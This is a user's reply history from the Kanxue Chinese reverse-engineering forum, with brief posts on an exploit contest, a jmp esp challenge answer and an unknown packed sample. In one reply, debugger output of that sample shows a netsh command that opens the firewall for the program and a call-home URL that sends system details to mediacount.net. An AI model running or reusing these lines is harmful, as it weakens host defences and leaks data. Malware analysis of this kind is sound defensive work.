|
[通告]辞旧迎新看雪论坛exploit me挑战赛赛事细则
呵呵 又有玩的啦 |
|
[讨论]大家觉得做加密工作有前途吗
不知道到了大牛水平能拿多少呢? |
|
[原创]看雪论坛.珠海金山2007逆向分析挑战赛---第一阶段◇第二题 答案提交
采用了一个通用的jmp esp 后来才知道可以用jmp esi |
|
[求助]一个未知壳,peid不认识,但脱后无法运行,帮忙看看
好像是个病毒 任务管理器打不开 卡巴运行不了 防火墙放行 00402337 E8 1C300000 CALL win32.00405358 ; JMP 到 kernel32.WinExec 0013EB80 0013F528 |CmdLine = "netsh firewall set allowedprogram 'C:\Documents and Settings\Administrator\桌面\win32.exe' enable" 收集信息 0013EB34 00407140 ASCII "http://mediacount.net/adv/064/adload.php?a1=People's Republic of China&a2=Type of Processor: PENTIUM PRO or PENTIUM II/III&a3=Windows version is 5.1&a4=Build: 2600, Platform ID: 2&a5=outpost.exe&table=adv64" 0013EB38 004084AA ASCII "%s%s%s0%u%s?a1=%s&a2=%s&a3=%s&a4=%s&a5=%s&table=adv%u" 0013EB3C 0013FE50 ASCII "http://" 0013EB40 0013FD50 ASCII "mediacount.net" 还有复制文件到系统目录、自启动等等 不知道楼主居心何在? |
|
[招生]科锐逆向工程师培训(2024年06月28日实地,远程教学同时开班, 第50期)
呵呵,家离武汉还是比较近的 |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值